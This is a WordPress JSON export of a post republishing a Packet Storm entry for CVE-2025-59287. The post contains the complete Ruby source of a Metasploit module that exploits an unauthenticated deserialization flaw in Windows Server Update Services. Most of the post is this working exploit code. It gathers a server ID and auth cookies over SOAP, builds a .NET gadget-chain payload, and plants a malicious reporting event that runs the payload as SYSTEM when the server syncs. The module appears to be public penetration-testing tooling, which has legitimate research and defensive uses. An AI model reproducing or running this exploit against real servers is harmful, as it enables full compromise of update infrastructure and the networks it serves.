{"id":25956,"date":"2025-11-12T11:37:35","date_gmt":"2025-11-12T11:37:35","guid":{"rendered":"http:\/\/localhost\/?p=25956"},"modified":"2025-11-12T11:37:35","modified_gmt":"2025-11-12T11:37:35","slug":"windows-server-update-service-deserialization-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=25956","title":{"rendered":"\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution_PACKETSTORM:211560"},"content":{"rendered":"

{“lastseen”:”2025-11-12T16:37:37″,”description”:”This Metasploit module exploits a deserialization vulnerability in…”,”published”:”2025-11-12T00:00:00″,”modified”:”2025-11-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:211560″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-59287″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = GreatRanking\\n \\n include Exploit::Remote::HttpClient\\n include Msf::Util::DotNetDeserialization\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Windows Server Update Service Deserialization Remote Code Execution’,\\n ‘Description’ =\\u003e %q{\\n This module exploits deserialization vulnerability in legacy serialization mechanism in Windows Server Update Services (WSUS). The vulnerability allows unauthenticated attacker to create specially crafted event, which triggers unsafe deserialization upon server synchronization. The module does not require any other options and upon successful exploitation, the payload is executed in context of administrator.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘mwulftange’, # security research\\n ‘msutovsky-r7’ # module development\\n ],\\n ‘References’ =\\u003e [\\n [ ‘ATT\\u0026CK’, Mitre::Attack::Technique::T1190_EXPLOIT_PUBLIC_FACING_APPLICATION],\\n [ ‘URL’, ‘https:\/\/code-white.com\/blog\/wsus-cve-2025-59287-analysis\/’],\\n [ ‘CVE’, ‘2025-59287’]\\n ],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Platform’ =\\u003e ‘win’,\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e ‘8530’,\\n ‘WfsDelay’ =\\u003e 900 # need to wait for WSUS to try synchronize\\n },\\n ‘Targets’ =\\u003e [\\n [ ‘Windows’, {}]\\n ],\\n \\n ‘DisclosureDate’ =\\u003e ‘2025-10-14’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SERVICE_RESTARTS],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, SCREEN_EFFECTS]\\n }\\n )\\n )\\n end\\n \\n def get_soap_response_xml(path, soap_action, data)\\n res = send_request_cgi({\\n ‘uri’ =\\u003e path,\\n ‘method’ =\\u003e ‘POST’,\\n ‘headers’ =\\u003e {\\n ‘SOAPAction’ =\\u003e soap_action\\n },\\n ‘ctype’ =\\u003e ‘text\/xml’,\\n ‘data’ =\\u003e data\\n })\\n \\n fail_with(Failure::UnexpectedReply, ‘Received unexpected response from WSUS’) unless res\\u0026.code == 200\\n xml = res.get_xml_document\\n xml.remove_namespaces!\\n xml\\n end\\n \\n def get_server_id\\n soap_body = \\u003c\\u003c~XML\\n \\u003c?xml version=\\”1.0\\” encoding=\\”utf-8\\”?\\u003e\\n \\u003csoap:Envelope xmlns:soap=\\”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\\”\\u003e\\n \\u003csoap:Body\\u003e\\n \\u003cGetRollupConfiguration xmlns=\\”http:\/\/www.microsoft.com\/SoftwareDistribution\\”\\u003e\\n \\u003ccookie xmlns:i=\\”http:\/\/www.w3.org\/2001\/XMLSchema-instance\\” i:nil=\\”true\\”\/\\u003e\\n \\u003c\/GetRollupConfiguration\\u003e\\n \\u003c\/soap:Body\\u003e\\n \\u003c\/soap:Envelope\\u003e\\n XML\\n \\n xml = get_soap_response_xml(normalize_uri(‘ReportingWebService’, ‘ReportingWebService.asmx’), ‘http:\/\/www.microsoft.com\/SoftwareDistribution\/GetRollupConfiguration’, soap_body)\\n \\n @server_id = xml.xpath(‘\/\/ServerId’).text.to_s\\n \\n fail_with(Failure::Unknown, ‘Failed to get server ID’) unless @server_id\\n end\\n \\n def get_auth_cookie\\n soap_body = \\u003c\\u003c~XML\\n \\u003c?xml version=\\”1.0\\” encoding=\\”utf-8\\”?\\u003e\\n \\u003csoap:Envelope xmlns:soap=\\”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\\”\\u003e\\n \\u003csoap:Body\\u003e\\n \\u003cGetAuthorizationCookie xmlns=\\”http:\/\/www.microsoft.com\/SoftwareDistribution\/Server\/SimpleAuthWebService\\”\\u003e\\n \\u003cclientId\\u003e#{@server_id}\\u003c\/clientId\\u003e\\n \\u003ctargetGroupName\\u003e\\u003c\/targetGroupName\\u003e\\n \\u003cdnsName\\u003e#{Rex::Text.rand_text_alpha_lower(4..8)}\\u003c\/dnsName\\u003e\\n \\u003c\/GetAuthorizationCookie\\u003e\\n \\u003c\/soap:Body\\u003e\\n \\u003c\/soap:Envelope\\u003e\\n XML\\n \\n xml = get_soap_response_xml(normalize_uri(‘SimpleAuthWebService’, ‘SimpleAuth.asmx’), ‘http:\/\/www.microsoft.com\/SoftwareDistribution\/Server\/SimpleAuthWebService\/GetAuthorizationCookie’, soap_body)\\n \\n @auth_cookie = xml.xpath(‘\/\/CookieData’).text.to_s\\n @plugin_id = xml.xpath(‘\/\/PlugInId’).text.to_s\\n fail_with(Failure::Unknown, ‘Failed to get authentication cookie’) unless @auth_cookie \\u0026\\u0026 @plugin_id\\n end\\n \\n def get_reporting_parameters\\n timenow = Time.now.strftime(‘%Y-%m-%dT%H:%M:%SZ’)\\n \\n soap_body = \\u003c\\u003c~XML\\n \\u003c?xml version=\\”1.0\\” encoding=\\”utf-8\\”?\\u003e\\n \\u003csoap:Envelope xmlns:soap=\\”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\\”\\u003e\\n \\u003csoap:Body\\u003e\\n \\u003cGetCookie xmlns=\\”http:\/\/www.microsoft.com\/SoftwareDistribution\/Server\/ClientWebService\\”\\u003e\\n \\u003cauthCookies\\u003e\\n \\u003cAuthorizationCookie\\u003e\\n \\u003cPlugInId\\u003e#{@plugin_id}\\u003c\/PlugInId\\u003e\\n \\u003cCookieData\\u003e#{@auth_cookie}\\u003c\/CookieData\\u003e\\n \\u003c\/AuthorizationCookie\\u003e\\n \\u003c\/authCookies\\u003e\\n \\u003coldCookie xmlns:i=\\”http:\/\/www.w3.org\/2001\/XMLSchema-instance\\” i:nil=\\”true\\”\/\\u003e\\n \\u003clastChange\\u003e#{timenow}\\u003c\/lastChange\\u003e\\n \\u003ccurrentTime\\u003e#{timenow}\\u003c\/currentTime\\u003e\\n \\u003cprotocolVersion\\u003e1.20\\u003c\/protocolVersion\\u003e\\n \\u003c\/GetCookie\\u003e\\n \\u003c\/soap:Body\\u003e\\n \\u003c\/soap:Envelope\\u003e\\n XML\\n \\n xml = get_soap_response_xml(normalize_uri(‘ClientWebService’, ‘Client.asmx’), ‘http:\/\/www.microsoft.com\/SoftwareDistribution\/Server\/ClientWebService\/GetCookie’, soap_body)\\n \\n @encrypted_data = xml.xpath(‘\/\/EncryptedData’).text.to_s\\n @expiration = xml.xpath(‘\/\/Expiration’).text.to_s\\n \\n fail_with(Failure::Unknown, ‘Failed to get reporting parameters’) unless @encrypted_data \\u0026\\u0026 @expiration\\n end\\n \\n def create_malicious_event\\n timenow = Time.now.strftime(‘%Y-%m-%dT%H:%M:%SZ’)\\n payload_data = ::Msf::Util::DotNetDeserialization.generate(\\n payload.encoded,\\n gadget_chain: :WindowsIdentity,\\n formatter: :SoapFormatter\\n )\\n \\n soap_body = \\u003c\\u003c~XML\\n \\u003csoap:Envelope xmlns:soap=\\”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\\” xmlns:xsi=\\”http:\/\/www.w3.org\/2001\/XMLSchema-instance\\” xmlns:xsd=\\”http:\/\/www.w3.org\/2001\/XMLSchema\\” xmlns:soapenc=\\”http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\\”\\u003e\\n \\u003csoap:Body\\u003e\\n \\u003cReportEventBatch xmlns=\\”http:\/\/www.microsoft.com\/SoftwareDistribution\\”\\u003e\\n \\u003ccookie\\u003e\\n \\u003cExpiration\\u003e#{@expiration}\\u003c\/Expiration\\u003e\\n \\u003cEncryptedData\\u003e#{@encrypted_data}\\u003c\/EncryptedData\\u003e\\n \\u003c\/cookie\\u003e\\n \\u003cclientTime\\u003e#{timenow}\\u003c\/clientTime\\u003e\\n \\u003ceventBatch xmlns:q1=\\”http:\/\/www.microsoft.com\/SoftwareDistribution\\” soapenc:arrayType=\\”q1:ReportingEvent[1]\\”\\u003e\\n \\u003cReportingEvent\\u003e\\n \\u003cBasicData\\u003e\\n \\u003cTargetID\\u003e\\n \\u003cSid\\u003e#{SecureRandom.uuid.strip}\\u003c\/Sid\\u003e\\n \\u003c\/TargetID\\u003e\\n \\u003cSequenceNumber\\u003e0\\u003c\/SequenceNumber\\u003e\\n \\u003cTimeAtTarget\\u003e#{timenow}\\u003c\/TimeAtTarget\\u003e\\n \\u003cEventInstanceID\\u003e#{SecureRandom.uuid.strip}\\u003c\/EventInstanceID\\u003e\\n \\u003cNamespaceID\\u003e2\\u003c\/NamespaceID\\u003e\\n \\u003cEventID\\u003e389\\u003c\/EventID\\u003e\\n \\u003cSourceID\\u003e301\\u003c\/SourceID\\u003e\\n \\u003cUpdateID\\u003e\\n \\u003cUpdateID\\u003e#{SecureRandom.uuid.strip}\\u003c\/UpdateID\\u003e\\n \\u003cRevisionNumber\\u003e0\\u003c\/RevisionNumber\\u003e\\n \\u003c\/UpdateID\\u003e\\n \\u003cWin32HResult\\u003e0\\u003c\/Win32HResult\\u003e\\n \\u003cAppName\\u003e#{Rex::Text.rand_text_alpha_lower(4..8)}\\u003c\/AppName\\u003e\\n \\u003c\/BasicData\\u003e\\n \\u003cExtendedData\\u003e\\n \\u003cMiscData soapenc:arrayType=\\”xsd:string[2]\\”\\u003e\\n \\u003cstring\\u003eAdministrator=SYSTEM\\u003c\/string\\u003e\\n \\u003cstring\\u003eSynchronizationUpdateErrorsKey=#{Rex::Text.html_encode(payload_data)}\\u003c\/string\\u003e\\n \\u003c\/MiscData\\u003e\\n \\u003c\/ExtendedData\\u003e\\n \\u003cPrivateData\\u003e\\n \\u003cComputerDnsName\\u003e\\u003c\/ComputerDnsName\\u003e\\n \\u003cUserAccountName\\u003e\\u003c\/UserAccountName\\u003e\\n \\u003c\/PrivateData\\u003e\\n \\u003c\/ReportingEvent\\u003e\\n \\u003c\/eventBatch\\u003e\\n \\u003c\/ReportEventBatch\\u003e\\n \\u003c\/soap:Body\\u003e\\n \\u003c\/soap:Envelope\\u003e\\n XML\\n \\n xml = get_soap_response_xml(normalize_uri(‘ReportingWebService’, ‘ReportingWebService.asmx’), ‘http:\/\/www.microsoft.com\/SoftwareDistribution\/ReportEventBatch’, soap_body)\\n \\n fail_with(Failure::PayloadFailed, ‘Failed to create malicious report, target might be not vulnerable’) unless xml.xpath(‘\/\/ReportEventBatchResult’).text.to_s == ‘true’\\n end\\n \\n ##\\n # Could not find better way to check if target is running vulnerable WSUS, leaving it for now with checking for presence of WSUS\\n ##\\n def check\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’\\n })\\n return CheckCode::Safe(‘Target does not run WSUS’) unless res\\u0026.code == 200 \\u0026\\u0026 res.headers[‘Server’] == ‘Microsoft-IIS\/10.0’\\n \\n CheckCode::Detected(‘Target is probably running WSUS’)\\n end\\n \\n def exploit\\n vprint_status(‘Getting server ID’)\\n get_server_id\\n vprint_status(‘Getting authentication cookie’)\\n get_auth_cookie\\n vprint_status(‘Getting reporting cookie’)\\n get_reporting_parameters\\n vprint_status(‘Trying to create malicious event’)\\n create_malicious_event\\n vprint_status(‘Created malicious event, now waiting for WSUS to sync’)\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/211560″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/211560\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-11-12T16:37:37″,”description”:”This Metasploit module exploits a deserialization vulnerability in…”,”published”:”2025-11-12T00:00:00″,”modified”:”2025-11-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:211560″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-59287″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-25956","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution_PACKETSTORM:211560 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=25956\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution_PACKETSTORM:211560 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-11-12T16:37:37″,”description”:”This Metasploit module exploits a deserialization vulnerability in…”,”published”:”2025-11-12T00:00:00″,”modified”:”2025-11-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:211560″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-59287″],”sourceData”:”##n # This module requires Metasploit: https:\/\/metasploit.com\/downloadn # Current source:...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=25956\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-12T11:37:35+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25956#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25956\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution_PACKETSTORM:211560\",\"datePublished\":\"2025-11-12T11:37:35+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25956\"},\"wordCount\":1641,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=25956#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25956\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25956\",\"name\":\"\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution_PACKETSTORM:211560 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-12T11:37:35+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25956#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=25956\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=25956#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution_PACKETSTORM:211560\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution_PACKETSTORM:211560 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=25956","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution_PACKETSTORM:211560 - zero redgem","og_description":"{“lastseen”:”2025-11-12T16:37:37″,”description”:”This Metasploit module exploits a deserialization vulnerability in…”,”published”:”2025-11-12T00:00:00″,”modified”:”2025-11-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:211560″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-59287″],”sourceData”:”##n # This module requires Metasploit: https:\/\/metasploit.com\/downloadn # Current source:...","og_url":"https:\/\/zero.redgem.net\/?p=25956","og_site_name":"zero redgem","article_published_time":"2025-11-12T11:37:35+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=25956#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=25956"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution_PACKETSTORM:211560","datePublished":"2025-11-12T11:37:35+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=25956"},"wordCount":1641,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=25956#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=25956","url":"https:\/\/zero.redgem.net\/?p=25956","name":"\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution_PACKETSTORM:211560 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-12T11:37:35+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=25956#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=25956"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=25956#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Windows Server Update Service Deserialization Remote Code Execution_PACKETSTORM:211560"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/25956","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25956"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/25956\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25956"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25956"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25956"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}